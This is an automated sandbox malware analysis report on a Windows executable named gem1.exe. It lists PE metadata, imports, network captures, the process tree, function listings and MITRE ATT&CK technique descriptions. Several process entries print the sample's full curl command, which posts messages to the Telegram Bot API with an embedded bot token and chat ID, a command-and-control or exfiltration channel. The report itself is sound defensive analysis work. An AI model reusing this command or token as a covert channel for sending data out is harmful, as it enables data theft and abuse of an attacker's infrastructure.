.reloc	0x7000	0x30	0x200	d8ba282c8a10920ec6dc9b480f625169	False	0.125	data	0.7225426795343004	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x6060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
VCRUNTIME140.dll	__current_exception_context, __current_exception, __C_specific_handler, memset, memcpy
api-ms-win-crt-runtime-l1-1-0.dll	_crt_atexit, terminate, system, _seh_filter_exe, _register_onexit_function, _c_exit, _cexit, __p___argv, __p___argc, _set_app_type, _exit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _register_thread_local_exe_atexit_callback, _initialize_onexit_table
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vsnprintf_s, __p__commode, _set_fmode
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode
KERNEL32.dll	GetCurrentThreadId, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, GetModuleHandleW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, RtlCaptureContext, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T15:28:54.759276+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49706	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 15:28:54.048378944 CET	49706	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:28:54.048446894 CET	443	49706	149.154.167.220	192.168.2.5
Jan 9, 2025 15:28:54.048533916 CET	49706	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:28:54.110399008 CET	49706	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:28:54.110488892 CET	443	49706	149.154.167.220	192.168.2.5
Jan 9, 2025 15:28:54.750452042 CET	443	49706	149.154.167.220	192.168.2.5
Jan 9, 2025 15:28:54.750777006 CET	49706	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:28:54.755610943 CET	49706	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:28:54.755628109 CET	443	49706	149.154.167.220	192.168.2.5
Jan 9, 2025 15:28:54.755861998 CET	443	49706	149.154.167.220	192.168.2.5
Jan 9, 2025 15:28:54.759113073 CET	49706	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:28:54.799343109 CET	443	49706	149.154.167.220	192.168.2.5
Jan 9, 2025 15:28:55.003659964 CET	443	49706	149.154.167.220	192.168.2.5
Jan 9, 2025 15:28:55.003741026 CET	443	49706	149.154.167.220	192.168.2.5
Jan 9, 2025 15:28:55.003804922 CET	49706	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:28:55.013514996 CET	49706	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:28:55.013530970 CET	443	49706	149.154.167.220	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 15:28:54.017193079 CET	56221	53	192.168.2.5	1.1.1.1
Jan 9, 2025 15:28:54.026272058 CET	53	56221	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 15:28:54.017193079 CET	192.168.2.5	1.1.1.1	0xb5ca	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 15:28:54.026272058 CET	1.1.1.1	192.168.2.5	0xb5ca	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	149.154.167.220	443	6396	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:28:54 UTC	211	OUT	POST /bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage HTTP/1.1 Host: api.telegram.org User-Agent: curl/7.83.1 Accept: / Content-Length: 42 Content-Type: application/x-www-form-urlencoded
2025-01-09 14:28:54 UTC	42	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 37 34 33 37 34 30 33 38 34 36 26 74 65 78 74 3d cf f0 ee e3 f0 e0 ec ec e0 20 e7 e0 ef f3 f9 e5 ed e0 Data Ascii: chat_id=7437403846&text=
2025-01-09 14:28:55 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 14:28:54 GMT Content-Type: application/json Content-Length: 91 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 14:28:55 UTC	91	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 73 74 72 69 6e 67 73 20 6d 75 73 74 20 62 65 20 65 6e 63 6f 64 65 64 20 69 6e 20 55 54 46 2d 38 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: strings must be encoded in UTF-8"}

Target ID:	0
Start time:	09:28:53
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\gem1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\gem1.exe"
Imagebase:	0x7ff662620000
File size:	11'776 bytes
MD5 hash:	AC4B32D014D380C67FBEA66FAF32AE99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:28:53
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:28:53
Start date:	09/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "
Imagebase:	0x7ff610f60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:28:53
Start date:	09/01/2025
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "
Imagebase:	0x7ff6e7c00000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	22.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.6%
Total number of Nodes:	51
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF662621214 Relevance: 3.1, APIs: 2, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF66262123D
__scrt_release_startup_lock.LIBCMT ref: 00007FF6626212AB

Memory Dump Source

Source File: 00000000.00000002.2041732687.00007FF662621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF662620000, based on PE: true

Associated: 00000000.00000002.2041713236.00007FF662620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041747210.00007FF662622000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041785248.00007FF662625000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff662620000_gem1.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_release_startup_lock
String ID:
API String ID: 3055961719-0
Opcode ID: 93a1e1bc6022631f4bd445f8765c4935dc323af9d1f72023d73b8ae34566eeaf
Instruction ID: 1b0f2c2ab0acefe7e3ab914a5fe53a5e88728a5ebed1377be0424e3e0612b26b
Opcode Fuzzy Hash: 93a1e1bc6022631f4bd445f8765c4935dc323af9d1f72023d73b8ae34566eeaf
Instruction Fuzzy Hash: C9314CA1E0F143C3EF14AB2194513B912B1AF4578CF4400B4EA4DCF6D7DEEEA845A781

Non-executed Functions

Function 00007FF662621880 Relevance: 13.6, APIs: 9, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF66262189C
memset.VCRUNTIME140 ref: 00007FF6626218C0
RtlCaptureContext.KERNEL32 ref: 00007FF6626218C9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6626218E3
RtlVirtualUnwind.KERNEL32 ref: 00007FF662621924
memset.VCRUNTIME140 ref: 00007FF662621957
IsDebuggerPresent.KERNEL32 ref: 00007FF662621978
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF662621995
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6626219A0

Memory Dump Source

Source File: 00000000.00000002.2041732687.00007FF662621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF662620000, based on PE: true

Associated: 00000000.00000002.2041713236.00007FF662620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041747210.00007FF662622000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041785248.00007FF662625000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff662620000_gem1.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 550b66adce13fbede535541e62ac0f56b9da69d949697b5386e86e1094862265
Instruction ID: af3fb36cc17ef369c6e4342cf3c6d3042aee2bfc20393877e251e9b2d3bb0698
Opcode Fuzzy Hash: 550b66adce13fbede535541e62ac0f56b9da69d949697b5386e86e1094862265
Instruction Fuzzy Hash: 913121B2619B81C6EB608F60E8807ED7370FB84748F44443ADA4D9BB99DF79D648D710

Function 00007FF662621760 Relevance: 6.0, APIs: 4, Instructions: 39
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF66262178C
GetCurrentThreadId.KERNEL32 ref: 00007FF66262179A
GetCurrentProcessId.KERNEL32 ref: 00007FF6626217A6
QueryPerformanceCounter.KERNEL32 ref: 00007FF6626217B6

Memory Dump Source

Source File: 00000000.00000002.2041732687.00007FF662621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF662620000, based on PE: true

Associated: 00000000.00000002.2041713236.00007FF662620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041747210.00007FF662622000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041785248.00007FF662625000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff662620000_gem1.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: a77de6920fbe06627394d409d93dd5500b4708a59dfe997caffd1c0562e18aad
Instruction ID: 0356814cfc6988945f26d07ed8aefee007610f0fb3bc2128ab32f71206d21ea4
Opcode Fuzzy Hash: a77de6920fbe06627394d409d93dd5500b4708a59dfe997caffd1c0562e18aad
Instruction Fuzzy Hash: C7111C62B15B45CAEF008F60E8542B833B4FB59758F441E31DA6DCABA8DFB8D198C340

Function 00007FF662621A24 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041732687.00007FF662621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF662620000, based on PE: true

Associated: 00000000.00000002.2041713236.00007FF662620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041747210.00007FF662622000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041785248.00007FF662625000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff662620000_gem1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf45aa958c34dd02e9bd6e2e8a18028edfec3694967a3d27f930b40693e62de
Instruction ID: 7ce0e30fb28e120596ba760b3f66337dd983a62a2bb2dc6912efa9bf6c79fa94
Opcode Fuzzy Hash: 8cf45aa958c34dd02e9bd6e2e8a18028edfec3694967a3d27f930b40693e62de
Instruction Fuzzy Hash: 13A002E1D1FD42D2EF058B00E9506B02331FB64308B410172C00DCDC69DFBDA501E710

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gem1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
gem1.exe

Function 00007FF662621214 Relevance: 3.1, APIs: 2, Instructions: 94
COMMON

Function 00007FF662621880 Relevance: 13.6, APIs: 9, Instructions: 71
COMMON

Function 00007FF662621760 Relevance: 6.0, APIs: 4, Instructions: 39
timethreadCOMMON